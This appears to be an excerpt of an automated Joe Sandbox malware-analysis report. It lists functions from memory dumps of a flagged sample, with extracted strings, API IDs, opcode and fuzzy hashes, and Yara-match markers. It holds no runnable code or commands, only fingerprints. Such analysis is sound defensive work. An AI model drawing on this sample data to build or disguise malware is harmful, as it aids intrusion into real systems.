                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                          • API String ID: 48624451-2108815105
                                                                                          • Opcode ID: 8ccce611d98d19fd06eda706218d71a56a1e180768ca71a046a66d9aabdc5993
                                                                                          • Instruction ID: b66911016b5e55ddbcffd45bba9a6388ebaab6e140062be98a0be6b8b9fab70d
                                                                                          • Opcode Fuzzy Hash: 8ccce611d98d19fd06eda706218d71a56a1e180768ca71a046a66d9aabdc5993
                                                                                          • Instruction Fuzzy Hash: B2612971900655AACB24CF5DC8808FFBBF5EF94300B94C9AEE5E647680D734EA80CB60
                                                                                          Function 00B73B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                          • API String ID: 48624451-2108815105
                                                                                          • Opcode ID: 835fba43edeb7fd2f3b2232495e303c7463b8271da2f16704e75d89010d7f719
                                                                                          • Instruction ID: 1c076bb921a246187493cbdea9012c027dfcc01129800d62497278c8fc7239a9
                                                                                          • Opcode Fuzzy Hash: 835fba43edeb7fd2f3b2232495e303c7463b8271da2f16704e75d89010d7f719
                                                                                          • Instruction Fuzzy Hash: BE618072904748AFCB219F69C9404BA7BF5EF54710B14C5AAF8BE97141E234EB40EB50
                                                                                          Function 00B07EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B23F12
                                                                                          Strings
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B23EC4
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B2E345
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B23F4A
                                                                                          • ExecuteOptions, xrefs: 00B23F04
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B2E2FB
                                                                                          • Execute=1, xrefs: 00B23F5E
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B23F75
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: BaseDataModuleQuery
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 3901378454-484625025
                                                                                          • Opcode ID: a7551d934fe236a902e20621bf394e4ab4fcb09dd8213d537ef8e2777613c684
                                                                                          • Instruction ID: 8032d25ab2e9afb4dd3a6f5a2246922e2e07de85c49d6a076c7e320ade8940eb
                                                                                          • Opcode Fuzzy Hash: a7551d934fe236a902e20621bf394e4ab4fcb09dd8213d537ef8e2777613c684
                                                                                          • Instruction Fuzzy Hash: D3418871A8025D7BDB20EA94ECD6FDAB3FCBB54700F0005E9B509E61C1EA70AB459B61
                                                                                          Function 00B10B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fassign
                                                                                          • String ID: .$:$:
                                                                                          • API String ID: 3965848254-2308638275
                                                                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                          • Instruction ID: d558425e207cb058b705e456671465b44d828559f74293a459486de45e4e498c
                                                                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                          • Instruction Fuzzy Hash: D0A1AE7192430ADFCF24EF64C8856EEBBF4EF15304F6485AAD412A7281D6B09AC1CF91
                                                                                          Function 00B10554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B32206
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                          • API String ID: 885266447-4236105082
                                                                                          • Opcode ID: 9735d8c686ec614f136978f27a8035ce7e471330f9094b9de1feee442e59d8fa
                                                                                          • Instruction ID: 06f68683407c3fea3178bc5adb9bef4062b4dd3577524fd1480e587aae6dbf2a
                                                                                          • Opcode Fuzzy Hash: 9735d8c686ec614f136978f27a8035ce7e471330f9094b9de1feee442e59d8fa
                                                                                          • Instruction Fuzzy Hash: B1513A35B002116FEB149B19DCC1FA733EAEB94710F3142A9FD09EB285D971EC818790
                                                                                          Function 00B114C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___swprintf_l.LIBCMT ref: 00B3EA22
                                                                                            • Part of subcall function 00B113CB: ___swprintf_l.LIBCMT ref: 00B1146B
                                                                                            • Part of subcall function 00B113CB: ___swprintf_l.LIBCMT ref: 00B11490
                                                                                          • ___swprintf_l.LIBCMT ref: 00B1156D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: %%%u$]:%u
                                                                                          • API String ID: 48624451-3050659472
                                                                                          • Opcode ID: e6a10c89bcef708063cab55885d692ab709524340c349ed85d4cb123de67c007
                                                                                          • Instruction ID: d8153b9e52968f04375a7132faa65177d4b9d5ec284256ef0d0f1717ea4cce28
                                                                                          • Opcode Fuzzy Hash: e6a10c89bcef708063cab55885d692ab709524340c349ed85d4cb123de67c007
                                                                                          • Instruction Fuzzy Hash: 7F218672900219ABCB20DE58CC41AEB77EDFB60700F944996F956D3240DB70EE988BE1
                                                                                          Function 00B73DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: %%%u$]:%u
                                                                                          • API String ID: 48624451-3050659472
                                                                                          • Opcode ID: 7c8394b591ee7eee0a50925645284f964ddec9c15966f8367d39e989dafa7ecb
                                                                                          • Instruction ID: e527911b14ef6726566a4d8bb582b904d9ebad6e004d10e2e44f343ceb5e1468
                                                                                          • Opcode Fuzzy Hash: 7c8394b591ee7eee0a50925645284f964ddec9c15966f8367d39e989dafa7ecb
                                                                                          • Instruction Fuzzy Hash: 6021D07290021AABCB20AE69CC459EF77ECEF14B14F0445A2FC29A7241EB709F44C7E1
                                                                                          Function 00AF53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B322F4
                                                                                          Strings
                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B322FC
                                                                                          • RTL: Resource at %p, xrefs: 00B3230B
                                                                                          • RTL: Re-Waiting, xrefs: 00B32328
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                          • API String ID: 885266447-871070163
                                                                                          • Opcode ID: 5f44589a160703a4584d44abb8150402cb745bfdfba22e2dcdfc51fe397977ab
                                                                                          • Instruction ID: 13963177ce06be076f344a1f99388d4ff42b9774f9c065ec30550bb19a73db37
                                                                                          • Opcode Fuzzy Hash: 5f44589a160703a4584d44abb8150402cb745bfdfba22e2dcdfc51fe397977ab
                                                                                          • Instruction Fuzzy Hash: 81513571A00705ABDB109B78DC91FA773E8EF58760F214269FE09DF281EA70EC4187A0
                                                                                          Function 00AFEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B3248D
                                                                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B324BD
                                                                                          • RTL: Re-Waiting, xrefs: 00B324FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                          • API String ID: 0-3177188983
                                                                                          • Opcode ID: d0495c18dee6c38a9f6f52962c24d2661dba460f1fcae19251a84322d3f315d9
                                                                                          • Instruction ID: 955655a095251a56b441ddc2aade6df434fef72516b5ce50317beacf4134dfdb
                                                                                          • Opcode Fuzzy Hash: d0495c18dee6c38a9f6f52962c24d2661dba460f1fcae19251a84322d3f315d9
                                                                                          • Instruction Fuzzy Hash: 2241F470A00204BFC720DBA8DD85FAA77F9EF44720F208686F6599B3D1D774E94187A0
                                                                                          Function 00B0FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fassign
                                                                                          • String ID:
                                                                                          • API String ID: 3965848254-0
                                                                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                          • Instruction ID: f05e827a27f08dcb7e5d98ba8b9a0350ad7ba48f66c402897f6cf269f8ce8bd6
                                                                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                          • Instruction Fuzzy Hash: 4A915C31E0020AEBDF24DF98C8456BEBBF4EF55304F3485BAD411A65E2E7309A81CB91
                                                                                          Function 00B85CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: __aulldvrm
                                                                                          • String ID: $$0
                                                                                          • API String ID: 1302938615-389342756
                                                                                          • Opcode ID: d348e7938c89a92d02caffcf2b2658e20601bb77adc28d9868206d3b4f603840
                                                                                          • Instruction ID: b242c793adf8ed19b3989667f01f18dde5f6268e1c578daed2e4dcd92bdbc1ba
                                                                                          • Opcode Fuzzy Hash: d348e7938c89a92d02caffcf2b2658e20601bb77adc28d9868206d3b4f603840
                                                                                          • Instruction Fuzzy Hash: 42917B70D04A8AEEDF35EFA988456EDBBF1EF01311F1446EAD8A1A72A1C7744A41CB50

                                                                                          Executed Functions

                                                                                          Function 05DCEE4E Relevance: 30.5, Strings: 24, Instructions: 475COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !$($.$1E$8Y$9m$?/$Am$J$J<$K$RA$Tj$X$]/$`$`q$a:$lv$n($r.$z$|$Z
                                                                                          • API String ID: 0-3335427861
                                                                                          • Opcode ID: 432d04ca83e8307ef9c310aa83dc057303fd6f9f95c42b8abd2c2c59524b757a
                                                                                          • Instruction ID: ab1472fa2a68d6733879fc6daee63408b7b436de7f47688606f8ead3dc91f25d
                                                                                          • Opcode Fuzzy Hash: 432d04ca83e8307ef9c310aa83dc057303fd6f9f95c42b8abd2c2c59524b757a
                                                                                          • Instruction Fuzzy Hash: 08429EB0E0522ACBEB24CF44CD94BEDBBB2FB45308F1081DAD5496B290D7B55A89CF54
                                                                                          Function 05DDC49E Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$O$S$\$s
                                                                                          • API String ID: 0-3854637164
                                                                                          • Opcode ID: e868d0cfc07faaa69437445dd44ba1ae694140033690e1bedff5f057ff63bb99
                                                                                          • Instruction ID: 053cdbe4183bfd5ed6b89d2121a0678874ddc1dc665343ebf496aa5ad72a9bc7
                                                                                          • Opcode Fuzzy Hash: e868d0cfc07faaa69437445dd44ba1ae694140033690e1bedff5f057ff63bb99
                                                                                          • Instruction Fuzzy Hash: 8D41A3B2A15119BBCB20EBD4DD48FEAF3BDEB48710F00419AE90997150E771AA54CBF0
                                                                                          Function 05DE8DDE Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1@$CO
                                                                                          • API String ID: 0-3271856365
                                                                                          • Opcode ID: d5367fcadc0c0237eb455368ab32a8165f941f740ed9f59757560cf1061dbf00
                                                                                          • Instruction ID: 0565a0ca45f8067ab3ad2c651cff758cabb565c67df223d5dfc3f56a6d864f9d
                                                                                          • Opcode Fuzzy Hash: d5367fcadc0c0237eb455368ab32a8165f941f740ed9f59757560cf1061dbf00
                                                                                          • Instruction Fuzzy Hash: 0211EFB6D01219AF9B40DFA9D8409EFBBF9EF48610F14416BE915E7200E7705A058BA1
                                                                                          Function 05DE927E Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $t$H-;
                                                                                          • API String ID: 0-1607043714
                                                                                          • Opcode ID: f292d33bd1a50f1bc245f87b49779f1ddf5e25a76b3ea3ec7870d07b4360e21a
                                                                                          • Instruction ID: 59a86b6cc75ee120785b65192b4000b4998f456a5e7f25b2420a7fe54abfc523
                                                                                          • Opcode Fuzzy Hash: f292d33bd1a50f1bc245f87b49779f1ddf5e25a76b3ea3ec7870d07b4360e21a
                                                                                          • Instruction Fuzzy Hash: 3111F4B6D01219AF8B00DF99DD409EFBBF9FF48200F04416BE915E7210E7705A048BA0
                                                                                          Function 05DE996E Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1}
                                                                                          • API String ID: 0-2838501580
                                                                                          • Opcode ID: ba0c63e1bb0797f91d0fb29885dc8a7f19f2ff60ab4040bdd18c69ff1b8e7d6b
                                                                                          • Instruction ID: e52abf015706db30a516790eb59bb04a39ae47be2184fa072e548f8501b52b91
                                                                                          • Opcode Fuzzy Hash: ba0c63e1bb0797f91d0fb29885dc8a7f19f2ff60ab4040bdd18c69ff1b8e7d6b
                                                                                          • Instruction Fuzzy Hash: A111DDB2D0121DAF8B41EFE9D8409EEFBF8EF49210F14456BE919E7200E7705A048BE1
                                                                                          Function 05DE8D4E Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: <*
                                                                                          • API String ID: 0-3918635734
                                                                                          • Opcode ID: 5d3ea86b4cf73581d14e47e169f14b5317848a2948dffec33904616e0e6b2216
                                                                                          • Instruction ID: 469525023baf981acbd5938d902a6c60c0075953c4332603f0053a3f97fc4873
                                                                                          • Opcode Fuzzy Hash: 5d3ea86b4cf73581d14e47e169f14b5317848a2948dffec33904616e0e6b2216
